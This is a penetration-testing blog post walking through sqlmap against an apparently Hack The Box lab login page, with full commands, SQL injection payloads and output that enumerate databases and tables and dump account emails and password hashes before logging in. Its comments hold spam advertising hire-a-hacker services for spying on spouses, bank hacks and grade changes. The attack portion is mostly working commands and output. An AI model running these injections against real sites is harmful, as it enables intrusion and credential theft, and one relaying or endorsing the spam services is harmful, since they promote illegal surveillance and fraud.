Skip to content

Pentestblog

Menu
  • Home
  • Kali Linux
  • Blog
  • CTF Challenges
  • Course
    • Download Free Videos
  • Contact Us

How To Dump Username And Password Using SQLMap Tool?

By Pentestblog 18/01/2022 SQL Injeciton 7 Comments

SQLMap Tool

Table of Content

  • What is sqlmap in Kali?
  • Dump Username And Password Using SQLMap

What is sqlmap in Kali?

SQLMap is an open-source tool that is used to both identify and exploit SQL injection vulnerabilities. SQLMap contains many advanced features such as the ability to dump username and password from a remote website and bypass WAF (Web Application Firewall) etc.


Dump Username And Password Using Sqlmap

In this blog, We are going to Introduce about SQLMap tool, which is most popular. Using this tool we will dump username and password from the remote website.

Let’s begin. We have opened the login page of Europa Corp admin portal. Keep in mind that this is a virtual environment. Don’t try to attack this website.


Let’s put some random email and password. First, we will intercept this traffic using the burp suite tool that comes pre-installed in Kali Linux.


We have intercepted all traffic of Europa Corp admin portal website using the burp suite tool. Let’s copy all content and save it in sql.req file.


sql.req file looks like this. Let’s open it using the cat command, which comes pre-installed in Kali Linux.


Before using the sqlmap tool, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don’t add –force-ssl command with sqlmap tool, you can get an SSL error. At this time, we will retrieve the database name using –dbs command.

sqlmap -r sql.req  --force-ssl  --dbs
sqlmap -r sql.req  --force-ssl  --dbs

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.1.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:59:46 /2022-01-16/

[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql' 
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema

[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 23:59:48 /2022-01-16/


Our first mission completed successfully. We have got the database name of remote website using the above command. Let’s find out all tables inside admin database. I think you should follow the below command.

 sqlmap -r sql.req  --force-ssl  -D admin --tables                              
 sqlmap -r sql.req  --force-ssl  -D admin --tables                              
        ___                                                                                                                                                                                   
       __H__                                                                                                                                        
 ___ ___[)]_____ ___ ___  {1.6.1.1#dev}                                                        
|_ -| . [']     | .'| . |                                                                      
|___|_  [)]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                          
                                                                                                                                                    
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program                                                                                                                                           
                                                                                                                                                                      
[*] starting @ 00:03:09 /2022-01-17/                                                                                                                                                          
                                                                                                                                                    
[00:03:09] [INFO] parsing HTTP request from 'sql.req'                                                                                                                                         
[00:03:10] [INFO] resuming back-end DBMS 'mysql'                                                                                                                      
[00:03:10] [INFO] testing connection to the target URL                                                                                                                                        
sqlmap resumed the following injection point(s) from stored session:      
---                                                                                                                                                                   
Parameter: email (POST)                                                                                                                                                                       
    Type: boolean-based blind                                                                                                                                                                 
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause                                                                                                                                                                                   
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password                                                                                                    
                                                                                                                                                                                              
    Type: error-based                                                                          
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                                                                                                                                                                        
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password                                         
                                                                                                                                                    
    Type: time-based blind                     
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                                         
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password                                                                                                                                                           
---                                      
[00:03:11] [INFO] the back-end DBMS is MySQL                                                                                         
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)                                                                                                                                                                                              
web application technology: Apache 2.4.18                                                                                                                                                     
back-end DBMS: MySQL 5                   
[00:03:11] [INFO] fetching tables for database: 'admin'                                                                              
[00:03:11] [INFO] resumed: 'users'                                                                                                                                                            
Database: admin                                                   
[1 table]                                      
+-------+                                      
| users |                                                         
+-------+                                      
                                               
[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'                                                                                                                                                  

[*] ending @ 00:03:11 /2022-01-17/                      


We have got the table name inside the admin database using the above command. Let’s find out all columns inside users table.

sqlmap -r sql.req --force-ssl -D admin -T users --columns
sqlmap -r sql.req  --force-ssl  -D admin -T users --columns 
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.1.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:05:52 /2022-01-17/

[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql' 
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| active   | tinyint(1)   |
| email    | varchar(255) |
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:05:54 /2022-01-17/


We have got the column’s name inside the users table using the above command. Let’s dump email and password credentials. Following the below command.

sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
sqlmap -r sql.req  --force-ssl  -D admin -T users -C email,password --dump                                                                                                                                                                                            
        ___                                                                                                                                         
       __H__                                                                                                                                                          
 ___ ___[,]_____ ___ ___  {1.6.1.1#dev}                                                                                                                                                       
|_ -| . [)]     | .'| . |                                                                                                                           
|___|_  ["]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  
                                                                                                                                                    
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program                                                                                                                                                                                                                                               
                                                                                                                                                                                              
[*] starting @ 00:08:33 /2022-01-17/                                      
                                                                          
[00:08:33] [INFO] parsing HTTP request from 'sql.req'                                                                                               
[00:08:34] [INFO] resuming back-end DBMS 'mysql'                                                                                                                      
[00:08:34] [INFO] testing connection to the target URL                             
sqlmap resumed the following injection point(s) from stored session:                                                                                                                          
---                                                                                            
Parameter: email (POST)                                                                                                                                                                                                                                                   
    Type: boolean-based blind                                                                                                                                                                 
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause                                                                                                                                                                                   
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password                                                                                                    
                                                                                                                                                                                              
    Type: error-based                                                     
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                                                                                                                                                                        
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password                                                                                                                     
                                                                                                                                                    
    Type: time-based blind                                                                                                                                            
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                  
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password                                                                                                                                                           
---                                                                                                                                                                                                                                                                       
[00:08:36] [INFO] the back-end DBMS is MySQL                                                                                                                                                  
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)                                                                                                                  
web application technology: Apache 2.4.18                                                                                            
back-end DBMS: MySQL 5                                                                                                                                                                        
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'                                                                                        
[00:08:38] [INFO] retrieved: '[email protected]'                                                                                  
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'                                                                      
[00:08:40] [INFO] retrieved: '[email protected]'                                                                                   
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'                                                                      
[00:08:42] [INFO] recognized possible password hashes in column 'password'                                                           
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n                                                                                                                                                                  
do you want to crack them via a dictionary-based attack? [Y/n/q] n                                                                                                                                                                                                        
Database: admin                                                                                                                                                                                                                                                           
Table: users                                                      
[2 entries]                                                       
+----------------------+----------------------------------+                                                                          
| email                | password                         |                                                                          
+----------------------+----------------------------------+                                                                          
| [email protected] | 2b6d315337f18617ba18922c0b9597ff |                                                                          
| [email protected]  | 2b6d315337f18617ba18922c0b9597ff |                                                                          
+----------------------+----------------------------------+                                                                          

[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'                                                                                                                              
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'                                                                                                                                                  

[*] ending @ 00:08:46 /2022-01-17/                                


Boom! We have got the email and password of the remote website, but the password is encrypted. In modern security, most websites store encrypted passwords inside the database. But I am lazy. To decrypt user hashes, we will use the dcode website.


Let’s put valid credentials inside the email and password field. After that, we got 302 redirections of the remote website.


Take a closer look at the below image.


Login Successful!!!!!


⭐⭐⭐⭐⭐

Rating: 5 out of 5.
Trending
Protected: How To Mount USB Drive in Ubuntu Linux


Recent Posts


  • Protected: How To Mount USB Drive in Ubuntu Linux
  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • SQL INJECTION – Extracting Username and Password From Database
  • How To Dump Username And Password Using SQLMap Tool?
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228

Most Popular Posts


  • Protected: How To Mount USB Drive in Ubuntu Linux
  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • SQL INJECTION – Extracting Username and Password From Database
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228

CTF Challenges for Beginners

Related

7 Comments

  1. Pankaj Jha 19/01/2022

    Very Nice Blog Bro

    Reply
  2. cysecon 10/02/2022

    hi…..

    I got such a good information on this topic its very interesting one. You made a good site

    Reply
  3. cysecon 11/03/2022

    hi…..

    I got such a good information on this topic its very interesting one. You made a good site and I have found a similar website, please check this one Ethical Hacking Training visit the site to know more about cysecon.

    Reply
  4. Ryan Harish 09/09/2022

    The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, , on whatsapp 18134211326..

    Reply
  5. Kate Lorena 05/02/2023

    Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on, , and you can Text/Call &WhatsApp: +1 (773)-609-2741, or +1201-430-5865, and figure out your relationship status. I wish you the best.

    Reply
  6. Eliott Sharon 02/05/2023

    My girlfriend was very smart at hiding her infidelity from me due to some selfish reasons. So I had no proof for weeks while hurting myself during this process. Luckily I was referred to this private investigator and the result was awesome and top notch. All my girlfriend’s dirty chats, Facebook, WhatsApp, Instagram, and even phone conversations were directed to my cell phone, if your girlfriend, boyfriend, wife or husband are experts at hiding his or her cheating adventures, contact this fast and trusted link. You can reach them via, TEXT,Call & Whatsapp,+1(201)4305865, or +1(773)6092741…

    Reply
  7. Lizzy Agnes 24/09/2023

    A great hacker is really worthy of good recommendation , Henry
    really help to get all the evidence i needed against my husband and
    and i was able to confront him with this details from this great hacker
    to get an amazing service done with the help ,he is good with what he does and the charges are affordable, I think all I owe him is publicity for a great work done via, , and you can text, call him on whatsapp him on +12014305865, or +17736092741,

    Reply

Add a Comment

Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • Protected: How To Mount USB Drive in Ubuntu Linux
  • CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
  • SQL INJECTION – Extracting Username and Password From Database
  • How To Dump Username And Password Using SQLMap Tool?
  • Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228

Recent Comments

  • Lizzy Agnes on How To Install AnyDesk In Ubuntu 20.04/18.04
  • Lizzy Agnes on Hack The Box (HTB) OSCP-Like machines List 2022
  • Lizzy Agnes on What is Termux? How To Use Termux Basic Command As a Beginner?
  • Lizzy Agnes on Download Our Best Hacking Videos Deleted by Youtube
  • Lizzy Agnes on Top 10 Best Computer Hacking Gadgets List 2022 For Hackers

Archives

  • January 2023
  • June 2022
  • May 2022
  • January 2022
  • December 2021
  • November 2021
  • September 2021
  • August 2021
  • July 2021
  • June 2021
  • May 2021
  • April 2021
  • March 2021
  • February 2021

Please Share

0
0
0
0
0
0
0
0
0

Follow Us

Pentestblog Youtube

RSS Pentestblog

  • Protected: How To Mount USB Drive in Ubuntu Linux

Categories

  • 0 Day CVE
  • 0-Day
  • Android Hacking
  • Apache Log4j
  • Blog
  • CTF Challange
  • CVE
  • Ethical Hacking
  • Gadgets
  • Hack the Box
  • Kali Linux
  • nothing
  • OSCP
  • Phishing
  • SQL Injeciton
  • SQL Injection
  • WordPress Hacking

Other Pages

  • Privacy Policy
  • DMCA
  • Terms and Conditions
  • About Us
  • Contact Us
  • Our Videos
  • Our Course
  • CTF Challenges
Pentestblog Copyright © 2024.
Created by Sandeep Yadav (Ethical Hacker) Back to Top ↑